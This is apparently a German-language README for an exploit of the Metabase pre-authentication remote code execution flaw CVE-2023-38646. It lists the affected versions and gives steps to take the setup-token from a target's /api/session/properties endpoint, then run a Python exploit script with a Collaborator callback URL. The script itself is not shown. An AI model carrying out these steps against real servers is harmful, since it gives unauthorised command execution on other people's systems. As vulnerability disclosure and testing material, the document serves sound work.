
Metabase Pre-Authentifizierungs-RCE (CVE-2023-38646)
Metabase ist ein Open-Source-Tool für Geschäftsanalysen, mit dem Sie Diagramme und Dashboards aus Daten einer Vielzahl von Datenbanken und Datenquellen erstellen können. Es ist ein beliebtes Projekt mit über 33.000 Sternen auf GitHub und wurde in den letzten Jahren aus der Perspektive der Sicherheitsforschung eingehend untersucht.
Metabase Open Source vor 0.46.6.1 und Metabase Enterprise vor 1.46.6.1 erlauben es Angreifern, beliebige Befehle auf dem Server mit den Berechtigungen des Servers auszuführen. Für die Ausnutzung ist keine Authentifizierung erforderlich. Die anderen behobenen Versionen sind 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 und 1.43.7.2.
* Gehe zu: http://target.com/api/session/properties
* Kopiere: setup-token
* Hole die Collaborator-URL
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>
Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2